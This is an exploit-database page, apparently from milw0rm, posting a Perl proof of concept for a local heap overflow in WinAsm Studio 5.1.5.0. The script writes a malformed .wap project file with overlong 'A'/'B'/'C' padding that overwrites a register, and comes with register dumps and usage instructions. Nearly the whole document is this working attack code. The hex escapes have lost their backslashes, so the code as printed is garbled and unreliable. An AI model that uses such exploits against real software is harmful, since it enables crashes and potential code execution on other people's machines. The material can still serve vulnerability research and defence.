WinAsm Studio 5.1.5.0 Local Heap Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WinAsm Studio 5.1.5.0 Local Heap Overflow PoC
# Published : 2009-03-16
# Author : Stack
# Previous Title : Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash
# Next Title : Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC

# WinAsm Studio 5.1.5.0 Local Heap Overflow Poc
# By Mountassif Moad
# D0wnload : http://www.winasm.net/index.php?ind=downloads&op=download_file&ide=182&file=WinAsm515Full.zip
# Greatz : Simo-Soft - Skd - fl0 fl0w - Str0ke & By By milw0rm :d
#
# Registers
# EAX 00000001
# ECX 00000001
# EDX 0013F814
# EBX 42424242  ( EBX overwrited :d )
# ESP 0013FBDC
# EBP 0013FE3C
# ESI 0013FBF7
# EDI 0013FD2F ASCII "BBBBBBBBBB" (next chars in EDI :d )
# EIP 0040A927 WinAsm.0040A927
my $m=
"x5Bx46x49x4Cx45x53x5Dx0Dx31x3D".
"x41" x 227 .
"x42" x 4 .
"x43" x 20 .
"x0Dx5Bx50x52".
"x4Fx4Ax45x43x54x5Dx0Dx54x79x70x65x3Dx0Dx52".
"x65x6Cx65x61x73x65x43x6Fx6Dx6Dx61x6Ex64x4Cx69x6E".
"x65x3Dx0Dx44x65x62x75x67x43x6Fx6Dx6Dx61x6Ex64".
"x4Cx69x6Ex65x3Dx0Dx41x75x74x6Fx49x6Ex63x46x69".
"x6Cx65x56x65x72x73x69x6Fx6Ex3Dx30x0Dx52x43x53".
"x69x6Cx65x6Ex74x3Dx30x0Dx50x65x6Cx6Cx65x73x54".
"x6Fx6Fx6Cx73x3Dx30x0Dx5Bx4Dx41x4Bx45x5Dx0D".
"x41x63x74x69x76x65x42x75x69x6Cx64x3Dx30x0Dx43".
"x6Fx6Dx70x69x6Cx65x52x43x3Dx0Dx52x43x54x6Fx4F".
"x62x6Ax3Dx0Dx41x73x73x65x6Dx62x6Cx65x3Dx2Fx63".
"x0Dx4Cx69x6Ex6Bx3Dx0Dx4Fx75x74x3Dx0Dx44".
"x65x62x41x73x73x65x6Dx62x6Cx65x3Dx2Fx63x0Dx44".
"x65x62x4Cx69x6Ex6Bx3Dx0Dx44x65x62x4Fx75x74x3D";
print $m;
print "n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
print " +++    WinAsm Studio 5.1.5.0 Local Heap Overflow Poc       +++n";
print " +++    Written By Stack                                    +++n";
print " +++    Usage Ex.: perl $0 >>Exploit.wap                    +++n";
print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
exit;

# www.Syue.com [2009-03-16]